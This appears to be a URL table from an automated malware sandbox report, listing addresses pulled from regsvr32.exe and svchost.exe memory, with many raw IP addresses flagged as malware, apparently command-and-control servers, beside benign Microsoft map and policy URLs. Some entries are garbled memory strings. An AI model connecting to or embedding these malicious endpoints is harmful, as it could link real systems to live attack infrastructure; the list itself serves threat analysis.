https://206.188.212.92:8080/WvwiYegTHwVudezOCrWPjYKhpMeUQep | regsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.502288144.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://dev.ditu.live.com/REST/v1/Traffic/Incidents/ | svchost.exe, 0000000E.00000002.314163787.000001ECDFA5C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.313794156.000001ECDFA5A000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://t0.tiles.ditu.live.com/tiles/gen | svchost.exe, 0000000E.00000002.314141397.000001ECDFA4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.313769610.000001ECDFA47000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://58.227.42.236/ | regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://dev.virtualearth.net/REST/v1/Routes/Walking | svchost.exe, 0000000E.00000003.313783832.000001ECDFA60000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://79.172.212.216:8080/VNwOftDFidReElfWGyCwgb | regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://192.99.251.50/njigQUBviBvfjJoFmpOFCcuxzCMjisKOYgnAJJuZGrOYExdzIkjfPaaGvSwrlp | regsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://46.55.222.11/.50.40.183:80/YQXxdxwQWLyBEVjMOlgty | regsvr32.exe, 00000006.00000003.502288144.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://120.50.40.183/rosoft | regsvr32.exe, 00000006.00000003.502288144.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://58.227.42.236:80/CBvqXjPjXUGuuflNLuZWkXecSmHukPuGWkGWJXlIStqkcdnP | regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://dev.ditu.live.com/REST/v1/Imagery/Copyright/ | svchost.exe, 0000000E.00000003.313794156.000001ECDFA5A000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://51.91.7.5:8080/EEsdElRrfqZScZWLqBhRqLSt | regsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://103.221.221.247:8080/ | regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://131.100.24.231:80/MIMNtRZxLqGHZoTXVDtaMauEeLlGAjcyCUbpgyHmvtdbZTHIDbPoaw | regsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://192.99.251.50/: | regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://dev.virtualearth.net/REST/v1/Transit/Schedules/ | svchost.exe, 0000000E.00000003.313814458.000001ECDFA40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.314134200.000001ECDFA42000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://192.99.251.50/F | regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://58.227.42.236:80/CBvqXjPjXUGuuflNLuZWkXecSmHukPuGWkGWJXlIStqkcdnPK | regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://192.99.251.50/ | regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://www.bingmapsportal.com | svchost.exe, 0000000E.00000002.314090796.000001ECDFA13000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://131.100.24.231/ | regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r= | svchost.exe, 0000000E.00000003.313809959.000001ECDFA56000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://103.221.221.247:8080/PosEzINMiHgCPAexqpnbXngfJaZeCEEsiTgLE3062332-1002 | regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://46.55.222.11/TBwKHjQjVeCWIQFSz | regsvr32.exe, 00000006.00000003.502288144.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://dev.virtualearth.net/REST/v1/Routes/ | svchost.exe, 0000000E.00000002.314128119.000001ECDFA3D000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://149.56.128.192/SSYKvnZUOEUlRtjgPVsscjkUTaNTgTQQvJUHkyX- | regsvr32.exe, 00000006.00000003.410649801.0000000002BEC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.365020565.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508876930.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://crl.ver) | svchost.exe, 00000014.00000002.665412089.000001697FE63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.421495587.0000015C89EEC000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
https://58.227.42.236/N | regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r= | svchost.exe, 0000000E.00000002.314128119.000001ECDFA3D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.314090796.000001ECDFA13000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://79.172.212.216:8080/VNwOftDFidReElfWGyCwg( | regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://%s.xboxlive.com | svchost.exe, 0000000C.00000002.762160897.00000276B2E44000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | low
https://dev.virtualearth.net/REST/v1/Locations | svchost.exe, 0000000E.00000003.313783832.000001ECDFA60000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://58.227.42.236/c4 | regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/ | svchost.exe, 0000000E.00000002.314163787.000001ECDFA5C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.313794156.000001ECDFA5A000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://dynamic.t | svchost.exe, 0000000E.00000003.313761832.000001ECDFA63000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://185.157.82.211/ | regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://79.172.212.216:8080/nes | regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://dev.virtualearth.net/REST/v1/Routes/Transit | svchost.exe, 0000000E.00000003.313783832.000001ECDFA60000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://51.91.76.89/ | regsvr32.exe, 00000006.00000003.508876930.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://79.172.212.216:8080/. | regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://79.172.212.216/ | regsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r= | svchost.exe, 0000000E.00000002.314163787.000001ECDFA5C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.313794156.000001ECDFA5A000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://46.55.222.11/TBwKHjQjVeCWIQFSi | regsvr32.exe, 00000006.00000003.502288144.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/ | svchost.exe, 0000000E.00000002.314163787.000001ECDFA5C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.313794156.000001ECDFA5A000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r= | svchost.exe, 0000000E.00000003.313794156.000001ECDFA5A000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://206.188.212.92/X | regsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.502288144.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://160.16.218.63:8080/lksHycwarnaSRJQsEAZwtocdkTVZGajE | regsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.502288144.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://120.50.40.183/ | regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://159.8.59.82/ | regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://dev.virtualearth.net/REST/v1/Routes/Driving | svchost.exe, 0000000E.00000003.313783832.000001ECDFA60000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx | svchost.exe, 0000000E.00000002.314128119.000001ECDFA3D000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://131.100.24.231:80/MIMNtRZxLqGHZoTXVDtaMauEeLlGAjcyCUbpgyHmvtdbZTHIDbPoawrlp | regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://58.227.42.236:80/$v6/ | regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://58.227.42.236:80/D | regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://192.99.251.50/27.42.236/h | regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://79.172.212.216:8080/VNwOftDFidReElfWGyCwg$v6/ | regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n= | svchost.exe, 0000000E.00000003.313814458.000001ECDFA40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.314134200.000001ECDFA42000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://46.55.222.11/TBwKHjQjVeCWIQFSN | regsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.502288144.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://103.221.221.247/Certificates | regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://58.227.42.236:80/: | regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://dev.ditu.live.com/mapcontrol/logging.ashx | svchost.exe, 0000000E.00000003.313783832.000001ECDFA60000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://173.254.208.91:8080/iqyyOTGODIozOxlzJCOa | regsvr32.exe, 00000006.00000003.410649801.0000000002BEC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.365020565.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508876930.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://206.188.212.92/7 | regsvr32.exe, 00000006.00000003.502288144.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://173.254.208.91:8080/iqyyOTGODIozOxlzJCOT | regsvr32.exe, 00000006.00000003.410649801.0000000002BEC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.365020565.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508876930.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://185.157.82.211:8080/cal | regsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://120.50.40.183:80/$v6/ | regsvr32.exe, 00000006.00000003.410793511.0000000002C64000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.502288144.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://185.157.82.211:8080/r | regsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://206.188.212.92/ | regsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.502288144.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://58.227.42.236:80/- | regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://173.254.208.91/ | regsvr32.exe, 00000006.00000003.365060100.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.410742618.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508876930.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp | true |  | 
                                                                • Avira URL Cloud: malware
                                                                unknown
                                                                https://160.16.218.63/regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmptrue
                                                                • Avira URL Cloud: malware
                                                                unknown
                                                                https://www.hotspotshield.com/terms/svchost.exe, 00000017.00000003.392127513.0000015C8A7B4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.391991165.0000015C8A795000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.392087236.0000015C8A792000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.392152187.0000015C8AC02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.392175741.0000015C8AC03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.392461273.0000015C8AC19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.392344061.0000015C8A7B4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.392106913.0000015C8A7A4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://www.pango.co/privacysvchost.exe, 00000017.00000003.392127513.0000015C8A7B4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.391991165.0000015C8A795000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.392087236.0000015C8A792000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.392152187.0000015C8AC02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.392175741.0000015C8AC03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.392461273.0000015C8AC19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.392344061.0000015C8A7B4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.392106913.0000015C8A7A4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://149.56.128.192/regsvr32.exe, 00000006.00000003.365060100.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.410742618.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508876930.0000000002BEA000.00000004.00000020.00020000.00000000.sdmptrue
                                                                  • Avira URL Cloud: malware
                                                                  unknown
                                                                  https://159.8.59.82:8080/AgctwBgxIsTEnzPyqHwVtfcFBregsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmptrue
                                                                  • Avira URL Cloud: malware
                                                                  unknown
                                                                  https://www.tiktok.com/legal/reportsvchost.exe, 00000017.00000003.400782206.0000015C8A792000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://103.221.221.247/Globalregsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmptrue
                                                                  • Avira URL Cloud: malware
                                                                  unknown
                                                                  https://79.172.212.2167:8080/regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  low
                                                                  https://120.50.40.183:80/zaregsvr32.exe, 00000006.00000003.410793511.0000000002C64000.00000004.00000020.00020000.00000000.sdmptrue
                                                                  • Avira URL Cloud: malware
                                                                  unknown
                                                                  https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 0000000E.00000002.314128119.000001ECDFA3D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://46.55.222.11/regsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.502288144.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508921722.0000000002C1F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmptrue
                                                                    • Avira URL Cloud: malware
                                                                    unknown
                                                                    https://46.55.222.11/TBwKHjQjVeCWIQFS)regsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.502288144.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmptrue
                                                                    • Avira URL Cloud: malware
                                                                    unknown
                                                                    https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 0000000E.00000003.313783832.000001ECDFA60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://www.disneyplus.com/legal/your-california-privacy-rightssvchost.exe, 00000017.00000003.396728134.0000015C8A792000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://120.50.40.183/dregsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.502288144.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmptrue
                                                                      • Avira URL Cloud: malware
                                                                      unknown
                                                                      https://160.16.218.63:8080/5regsvr32.exe, 00000006.00000003.502288144.0000000002C2A000.00000004.00000020.00020000.00000000.sdmptrue
                                                                      • Avira URL Cloud: malware
                                                                      unknown
                                                                      https://103.221.221.247:8080/PosEzINMiHgCPAexqpnbXngfJaZeCEEsiTgLErregsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmptrue
                                                                      • Avira URL Cloud: malware
                                                                      unknown
                                                                      https://58.227.42.236:80/regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://103.221.221.247/regsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmptrue
                                                                      • Avira URL Cloud: malware
                                                                      unknown
